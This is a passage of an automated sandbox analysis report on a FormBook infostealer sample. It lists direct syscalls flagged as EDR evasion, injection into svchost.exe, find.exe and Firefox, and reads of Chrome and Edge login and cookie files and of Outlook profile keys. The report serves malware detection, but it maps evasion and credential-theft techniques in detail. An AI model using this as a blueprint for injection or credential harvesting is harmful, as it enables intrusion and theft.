Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]	2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]	2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]	2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]	2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]	2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]	2_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]	2_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]	2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]	2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]	2_2_03304940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]	2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]	2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]	2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]	2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0025A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0025A66C

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_002481AC
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00248189 SetUnhandledExceptionFilter,		0_2_00248189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\find.exe

Thread APC queued: target process: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 29EB008

Jump to behavior

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0025B106 LogonUserW,

0_2_0025B106

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00223D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00223D19

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0026411C SendInput,keybd_event,

0_2_0026411C

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_002674BB mouse_event,

0_2_002674BB

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WDpjhC3jpq.exe"	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

0_2_0025A66C

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_002671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_002671FA

Source: BrwYqDqbrpK.exe, 00000003.00000000.2275039877.0000000001400000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3375087707.0000000001401000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000000.2417372225.0000000001141000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: WDpjhC3jpq.exe, BrwYqDqbrpK.exe, 00000003.00000000.2275039877.0000000001400000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3375087707.0000000001401000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000000.2417372225.0000000001141000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: BrwYqDqbrpK.exe, 00000003.00000000.2275039877.0000000001400000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3375087707.0000000001401000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000000.2417372225.0000000001141000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: WDpjhC3jpq.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: BrwYqDqbrpK.exe, 00000003.00000000.2275039877.0000000001400000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3375087707.0000000001401000.00000002.00000001.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000000.2417372225.0000000001141000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_002465C4 cpuid

0_2_002465C4

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0027091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0027091D

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0029B340 GetUserNameW,

0_2_0029B340

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00251E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00251E8E

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0023DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0023DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2592843183.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3376817582.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2351397025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2592756925.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2353464103.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3375408223.0000000002AD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2352214386.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\find.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: WDpjhC3jpq.exe	Binary or memory string: WIN_81
Source: WDpjhC3jpq.exe	Binary or memory string: WIN_XP
Source: WDpjhC3jpq.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: WDpjhC3jpq.exe	Binary or memory string: WIN_XPe
Source: WDpjhC3jpq.exe	Binary or memory string: WIN_VISTA
Source: WDpjhC3jpq.exe	Binary or memory string: WIN_7
Source: WDpjhC3jpq.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2592843183.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3376817582.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2351397025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2592756925.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2353464103.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3375408223.0000000002AD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
